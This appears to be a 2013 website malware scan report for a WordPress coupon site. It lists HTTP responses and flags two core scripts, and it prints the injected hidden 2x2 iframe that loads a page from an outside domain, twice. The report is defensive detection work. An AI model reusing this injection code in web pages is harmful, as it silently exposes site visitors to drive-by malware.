Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newmanscoupons.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://newmanscoupons.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Oct 2013 03:32:38 GMT Pragma: no-cache Location: http://www.newmanscoupons.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/ X-Pingback: http://www.newmanscoupons.com/xmlrpc.php | clean |
http://www.newmanscoupons.com/ | 200 OK Content-Length: 14041 Content-Type: text/html | clean |
http://www.newmanscoupons.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 465 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The first statement below is the flagged content; the function after it appears to be the file's original WordPress code, so the iframe write was prepended to an otherwise legitimate core script:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153></iframe>');
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajaxmint.com/hwhi.html?j=1308153 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153> | ||
http://www.newmanscoupons.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://www.newmanscoupons.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 943 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The first statement below is the same iframe write reported for l10n.js; the object after it appears to be the file's original WordPress code. The same statement in two files under wp-includes points to a server-side compromise rather than a fault in one script, so cleanup means restoring these files from a known-good WordPress copy and finding how they were modified, not only deleting the added line:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}};
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajaxmint.com/hwhi.html?j=1308153 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajaxmint.com/hwhi.html?j=1308153> | ||
http://www.newmanscoupons.com/wp-content/themes/arjuna-x/default.js?ver=3.1.2 | 200 OK Content-Length: 9706 Content-Type: application/javascript | clean |
http://walls89.hopfeed.com/script/hopfeed.js | 500 Can't connect to walls89.hopfeed.com:80 (Bad hostname) Content-Length: 185 Content-Type: text/plain | clean |
http://walls89.hopfeed.com/test404page.js | 500 Can't connect to walls89.hopfeed.com:80 (Bad hostname) Content-Length: 185 Content-Type: text/plain | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 9028 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newmanscoupons.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Oct 2013 03:32:38 GMT
Pragma: no-cache
Location: http://www.newmanscoupons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/
X-Pingback: http://www.newmanscoupons.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: newmanscoupons.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Oct 2013 03:32:38 GMT
Pragma: no-cache
Location: http://www.newmanscoupons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2768a883c96cf6b1e7245473b4938097; path=/
X-Pingback: http://www.newmanscoupons.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: newmanscoupons.com
Referer: http://www.google.com/search?q=newmanscoupons.com
Result:
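The result is similar to the first query. There are no suspicious redirects found. This check varies only the Referer header on the root URL, so it does not rule out redirects conditioned on user agent, cookie or client address, and it is independent of the script findings listed under "Scanned pages/files".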
GET / HTTP/1.1
Host: newmanscoupons.com
Referer: http://www.google.com/search?q=newmanscoupons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.